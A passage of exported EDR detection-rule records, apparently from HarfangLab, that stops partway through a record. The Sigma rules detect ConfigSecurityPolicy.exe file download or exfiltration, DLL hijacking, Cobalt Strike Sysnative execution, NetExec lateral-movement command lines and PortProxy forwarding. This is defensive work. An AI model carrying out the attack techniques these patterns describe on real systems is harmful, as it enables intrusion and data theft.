"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.091235Z",
"creation_date": "2026-03-23T11:45:34.091238Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.091242Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/Binaries/ConfigSecurityPolicy/",
"https://attack.mitre.org/techniques/T1105/",
"https://attack.mitre.org/techniques/T1567/"
],
"name": "t1567_config_security_policy.yml",
"content": "title: File Downloaded or Exfiltrated via ConfigSecurityPolicy.exe\nid: 61ae1266-56f1-4aa8-82e3-d1b2ba0b3aae\ndescription: |\n Detects a suspicious execution of the ConfigSecurityPolicy.exe executable to download or exfiltrate a file.\n If a file was downloaded, it will be saved in one of these locations:\n - %LocalAppData%\\Microsoft\\Windows\\INetCache\\<8_RANDOM_ALNUM_CHARS>\\[1].\n - %LocalAppData%\\Microsoft\\Windows\\INetCache\\IE\\<8_RANDOM_ALNUM_CHARS>\\[1].\n Adversaries may transfer tools or exfiltrate files using legitimate tools to evade detection.\n It is recommended to check the content of the downloaded file and look for other suspicious behavior in the user's session.\nreferences:\n - https://lolbas-project.github.io/lolbas/Binaries/ConfigSecurityPolicy/\n - https://attack.mitre.org/techniques/T1105/\n - https://attack.mitre.org/techniques/T1567/\ndate: 2024/12/06\nmodified: 2025/04/11\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1105\n - attack.defense_evasion\n - attack.t1218\n - attack.exfiltration\n - attack.t1567\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.ConfigSecurityPolicy\n - classification.Windows.Behavior.FileDownload\n - classification.Windows.Behavior.CommandAndControl\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.Exfiltration\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_exe_image:\n - Image|endswith: '\\ConfigSecurityPolicy.exe'\n # Renamed binaries\n - OriginalFileName: 'ConfigSecurityPolicy.exe'\n\n selection_cmdline:\n CommandLine|contains:\n - 'http'\n - 'ftp://'\n\n exclusion_xml_config:\n CommandLine|contains: 'http://forefront.microsoft.com/'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "61ae1266-56f1-4aa8-82e3-d1b2ba0b3aae",
"rule_name": "File Downloaded or Exfiltrated via ConfigSecurityPolicy.exe",
"rule_description": "Detects a suspicious execution of the ConfigSecurityPolicy.exe executable to download or exfiltrate a file.\nIf a file was downloaded, it will be saved in one of these locations:\n - %LocalAppData%\\Microsoft\\Windows\\INetCache\\<8_RANDOM_ALNUM_CHARS>\\[1].\n - %LocalAppData%\\Microsoft\\Windows\\INetCache\\IE\\<8_RANDOM_ALNUM_CHARS>\\[1].\nAdversaries may transfer tools or exfiltrate files using legitimate tools to evade detection.\nIt is recommended to check the content of the downloaded file and look for other suspicious behavior in the user's session.\n",
"rule_creation_date": "2024-12-06",
"rule_modified_date": "2025-04-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.defense_evasion",
"attack.exfiltration"
],
"rule_technique_tags": [
"attack.t1105",
"attack.t1218",
"attack.t1567"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "61b86bcc-88c6-41c4-bb7d-d811859e298c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.097754Z",
"creation_date": "2026-03-23T11:45:34.097756Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.097760Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://securelist.com/a-new-secret-stash-for-fileless-malware/106393/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_werfault.yml",
"content": "title: DLL Hijacking via werfault.exe\nid: 61b86bcc-88c6-41c4-bb7d-d811859e298c\ndescription: |\n Detects potential Windows DLL Hijacking via werfault.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://securelist.com/a-new-secret-stash-for-fileless-malware/106393/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'werfault.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\cryptsp.dll'\n - '\\dbgcore.DLL'\n - '\\dbghelp.dll'\n - '\\faultrep.dll'\n - '\\wer.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n - '?:\\ProgramData\\docker\\windowsfilter\\\\*\\Files\\Windows\\System32\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "61b86bcc-88c6-41c4-bb7d-d811859e298c",
"rule_name": "DLL Hijacking via werfault.exe",
"rule_description": "Detects potential Windows DLL Hijacking via werfault.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "61c74714-e399-40ba-85c2-22fedaa60471",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.084931Z",
"creation_date": "2026-03-23T11:45:34.084933Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.084938Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://posts.specterops.io/a-deep-dive-into-cobalt-strike-malleable-c2-6660e33b0e0b",
"https://labs.f-secure.com/archive/persistence-architecture-matters/",
"https://attack.mitre.org/techniques/T1055/",
"https://attack.mitre.org/software/S0154/"
],
"name": "t1055_suspicious_execution_from_sysnative.yml",
"content": "title: Process Executed from the Sysnative Folder\nid: 61c74714-e399-40ba-85c2-22fedaa60471\ndescription: |\n Detects the execution of a process from the Sysnative folder.\n This can be the result of Cobalt Strike's exploitation via spawnto settings to launch temporary jobs through a legitimate binary.\n It is recommended to investigate the binary launched in the Sysnative to look for malicious content or actions as well as to look for Cobalt Strike-related alerts on the host.\nreferences:\n - https://posts.specterops.io/a-deep-dive-into-cobalt-strike-malleable-c2-6660e33b0e0b\n - https://labs.f-secure.com/archive/persistence-architecture-matters/\n - https://attack.mitre.org/techniques/T1055/\n - https://attack.mitre.org/software/S0154/\ndate: 2022/01/25\nmodified: 2026/03/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1055\n - attack.s0154\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Framework.CobaltStrike\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_commandline:\n CommandLine|startswith: '?:\\Windows\\sysnative\\'\n selection_parameters:\n # Command-line with no parameters\n CommandLine|contains: ' '\n\n exclusion_programfiles:\n ParentImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n exclusion_mobaxterm:\n # C:\\Program Files (x86)\\Mobatek\\MobaXterm\\MobaXterm.exe\n - CommandLine: '?:\\WINDOWS\\Sysnative\\WindowsPowerShell\\v1.0\\powershell.exe'\n ParentImage|endswith: '\\bin\\winpty-agent.exe'\n GrandparentImage|endswith: '\\bin\\conin.exe'\n - ParentImage|endswith: '?:\\Users\\\\*\\MobaXterm\\slash\\bin\\bash.exe'\n\n exclusion_kms:\n CommandLine: '?:\\Windows\\SysNative\\Vmw.exe'\n Signed: 'true'\n Signature: 'Microsoft Windows'\n OriginalFileName: 'Vmw.exe'\n\n exclusion_razer:\n CommandLine: '?:\\WINDOWS\\sysnative\\snippingtool'\n GrandparentImage: '?:\\Program Files (x86)\\Razer\\Synapse3\\Service\\Razer Synapse Service.exe'\n\n exclusion_sqlserver:\n CommandLine: '?:\\Windows\\sysnative\\WindowsPowerShell\\v1.0\\PowerShell.exe'\n # C:\\Program Files (x86)\\Microsoft SQL Server\\140\\Tools\\Binn\\ManagementStudio\\Ssms.exe\n # C:\\Program Files (x86)\\Microsoft SQL Server Management Studio 19\\Common7\\IDE\\Ssms.exe\n ProcessParentOriginalFileName: 'SSMS.EXE'\n ProcessParentSigned: 'true'\n ProcessParentSignature: 'Microsoft Corporation'\n\n # https://www.tranquil.it/\n exclusion_tranquil:\n - ProcessGrandparentProduct|contains: 'WAPTSetup' # Multiple space at the end\n ProcessGrandparentSigned: 'true'\n ProcessGrandparentSignature: 'Tranquil I.T. Systems'\n - ProcessGrandparentDescription|contains: 'WAPTSetup Setup'\n ProcessGrandparentCompany|contains: 'Tranquil IT'\n ProcessGrandparentImage:\n - '*\\waptagent.exe'\n - '*\\waptagent\\waptsetup.exe'\n\n exclusion_lenovo:\n ProcessParentOriginalFileName: 'lenovoupdate.exe'\n ProcessParentSigned: 'true'\n ProcessParentSignature: 'Lenovo (Beijing) Limited'\n\n exclusion_vscode:\n ProcessGrandparentImage|endswith: '\\Code.exe'\n ProcessGrandparentOriginalFileName: 'electron.exe'\n ProcessGrandparentSigned: 'true'\n ProcessGrandparentSignature: 'Microsoft Corporation'\n\n exclusion_tanium:\n - ProcessParentImage|endswith: '\\TaniumClient.exe'\n ProcessParentDescription: 'Tanium Client'\n ProcessParentCompany: 'Tanium Inc.'\n - ProcessGrandparentImage: '?:\\Program Files (x86)\\Tanium\\Tanium Client\\TaniumClient.exe'\n\n exclusion_ccm:\n - ParentImage|startswith: '?:\\Windows\\ccmcache\\'\n - Ancestors|contains: '?:\\Windows\\CCM\\CcmExec.exe'\n\n condition: selection_commandline and not selection_parameters and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "61c74714-e399-40ba-85c2-22fedaa60471",
"rule_name": "Process Executed from the Sysnative Folder",
"rule_description": "Detects the execution of a process from the Sysnative folder.\nThis can be the result of Cobalt Strike's exploitation via spawnto settings to launch temporary jobs through a legitimate binary.\nIt is recommended to investigate the binary launched in the Sysnative to look for malicious content or actions as well as to look for Cobalt Strike-related alerts on the host.\n",
"rule_creation_date": "2022-01-25",
"rule_modified_date": "2026-03-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1055"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "61ca4c01-0a75-4353-a620-f06226512ea0",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.587785Z",
"creation_date": "2026-03-23T11:45:34.587789Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.587797Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_spaceagent.yml",
"content": "title: DLL Hijacking via spaceagent.exe\nid: 61ca4c01-0a75-4353-a620-f06226512ea0\ndescription: |\n Detects potential Windows DLL Hijacking via spaceagent.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'spaceagent.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\netapi32.dll'\n - '\\NETUTILS.DLL'\n - '\\SRVCLI.DLL'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "61ca4c01-0a75-4353-a620-f06226512ea0",
"rule_name": "DLL Hijacking via spaceagent.exe",
"rule_description": "Detects potential Windows DLL Hijacking via spaceagent.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "61d02029-6ce0-4318-93d9-ed903605dcac",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.628399Z",
"creation_date": "2026-03-23T11:45:34.628401Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.628406Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/Pennyw0rth/NetExec",
"https://attack.mitre.org/techniques/T1047/",
"https://attack.mitre.org/techniques/T1021/002/",
"https://attack.mitre.org/techniques/T1021/003/",
"https://attack.mitre.org/software/S0488/"
],
"name": "t1047_netexec_lateral_movement.yml",
"content": "title: NetExec Lateral Movement Detected\nid: 61d02029-6ce0-4318-93d9-ed903605dcac\ndescription: |\n Detects lateral movement made using NetExec tools.\n NetExec is the new name of CrackMapExec, a tool intended to ease lateral movement, internal recon and credential gathering actions.\n It offers multiples options to remotely execute commands:\n - wmiexec: execute via WMI, the parent of the command will be WMIPrvse.exe;\n - atexec: execute via a schedule task, the parent of the command will be svchost.exe or taskeng.exe;\n - mmcexec: execute a command via DCOM, the parent of the command will be mmc.exe;\n - smbexec: execute via a service, the parent of the command will be services.exe.\n It is recommended to investigate actions made by the child process and identify the source of the remote connection using authentication logs.\nreferences:\n - https://github.com/Pennyw0rth/NetExec\n - https://attack.mitre.org/techniques/T1047/\n - https://attack.mitre.org/techniques/T1021/002/\n - https://attack.mitre.org/techniques/T1021/003/\n - https://attack.mitre.org/software/S0488/\ndate: 2023/12/20\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1047\n - attack.lateral_movement\n - attack.t1021.002\n - attack.t1021.003\n - attack.s0488\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.HackTool.NetExec\n - classification.Windows.Behavior.Lateralization\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_other:\n ParentImage|endswith:\n - '\\wmiprvse.exe' # wmiexec\n - '\\mmc.exe' # mmcexec\n - '\\explorer.exe' # dcomexec ShellBrowserWindow\n - '\\services.exe' # smbexec\n CommandLine|endswith:\n # wmiexec\n - 'cmd.exe /Q /c *1> * 2>&1 && certutil -encodehex -f * && for /F * %G in (*) do reg add HKLM\\\\* /v * /t REG_SZ /d * /f && del /q /f /s *'\n # mmcexec\n - 'cmd.exe /Q /c * 1> \\Windows\\Temp\\\\* 2>&1'\n # smbexec\n - 'cmd.exe* /Q /c * ^> \\\\\\\\*\\\\* 2^>^&1 > *'\n\n selection_atexec:\n ParentCommandLine|contains:\n - 'svchost.exe -k netsvcs' # atexec on win10\n - 'taskeng.exe' # atexec on win7\n CommandLine: 'cmd.exe /C *Windows\\Temp\\\\*&1'\n\n # This is handled by the rule 10c14723-61c7-4c75-92ca-9af245723ad2\n filter_impacket:\n CommandLine: '*\\\\\\\\127.0.0.1\\\\*' # specific to impacket\n\n condition: 1 of selection_* and not 1 of filter_*\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "61d02029-6ce0-4318-93d9-ed903605dcac",
"rule_name": "NetExec Lateral Movement Detected",
"rule_description": "Detects lateral movement made using NetExec tools.\nNetExec is the new name of CrackMapExec, a tool intended to ease lateral movement, internal recon and credential gathering actions.\nIt offers multiples options to remotely execute commands:\n - wmiexec: execute via WMI, the parent of the command will be WMIPrvse.exe;\n - atexec: execute via a schedule task, the parent of the command will be svchost.exe or taskeng.exe;\n - mmcexec: execute a command via DCOM, the parent of the command will be mmc.exe;\n - smbexec: execute via a service, the parent of the command will be services.exe.\nIt is recommended to investigate actions made by the child process and identify the source of the remote connection using authentication logs.\n",
"rule_creation_date": "2023-12-20",
"rule_modified_date": "2026-02-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1021.002",
"attack.t1021.003",
"attack.t1047"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "61e6a95d-f012-4562-af9b-2d917c66510f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.069249Z",
"creation_date": "2026-03-23T11:45:34.069265Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.069276Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html",
"https://attack.mitre.org/software/S0108/"
],
"name": "t1090_portproxy_port_forwarding.yml",
"content": "title: PortProxy Port Forwarding Set in Registry\nid: 61e6a95d-f012-4562-af9b-2d917c66510f\ndescription: |\n Detects a registry modification setting up a port forwarding configuration often used by attackers for lateral movement or to bypass network restrictions.\n Attackers may setup port forwarding configurations to evade firewall and to grant themselves access to services that would otherwise be inaccessible.\n It is recommended to analyze the process responsisble for the registry modification and to investigate any unwanted usage of firewalled services (such as RDP) after this action.\nreferences:\n - https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html\n - https://attack.mitre.org/software/S0108/\ndate: 2021/04/14\nmodified: 2026/01/16\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.lateral_movement\n - attack.command_and_control\n - attack.t1090\n - attack.s0108\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.Lateralization\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: 'SetValue'\n # Example: \"HKLM\\SYSTEM\\ControlSet001\\services\\PortProxy\\v4tov4\\tcp\\*/4444\"\n TargetObject|contains: '\\PortProxy\\v4tov4\\'\n\n filter_empty:\n Details:\n - '(Empty)'\n - ''\n\n exclusion_image:\n - ProcessParentImage:\n - '?:\\Program Files\\Dell\\SysMgt\\iSM\\ismeng\\bin\\dsm_ism_srvmgr.exe'\n - '?:\\Program Files\\AgiCorp\\IMSEngine\\IMSEngine.exe'\n - ProcessAncestors|contains: '?:\\Program Files\\UniFi OS Server\\UniFi OS Server.exe'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "61e6a95d-f012-4562-af9b-2d917c66510f",
"rule_name": "PortProxy Port Forwarding Set in Registry",
"rule_description": "Detects a registry modification setting up a port forwarding configuration often used by attackers for lateral movement or to bypass network restrictions.\nAttackers may setup port forwarding configurations to evade firewall and to grant themselves access to services that would otherwise be inaccessible.\nIt is recommended to analyze the process responsisble for the registry modification and to investigate any unwanted usage of firewalled services (such as RDP) after this action.\n",
"rule_creation_date": "2021-04-14",
"rule_modified_date": "2026-01-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.defense_evasion",
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1090"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "622305f6-be32-4277-ae7e-4fc4883f8645",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.599523Z",
"creation_date": "2026-03-23T11:45:34.599527Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.599535Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_runexehelper.yml",
"content": "title: DLL Hijacking via runexehelper.exe\nid: 622305f6-be32-4277-ae7e-4fc4883f8645\ndescription: |\n Detects potential Windows DLL Hijacking via runexehelper.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'runexehelper.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\userenv.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "622305f6-be32-4277-ae7e-4fc4883f8645",
"rule_name": "DLL Hijacking via runexehelper.exe",
"rule_description": "Detects potential Windows DLL Hijacking via runexehelper.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
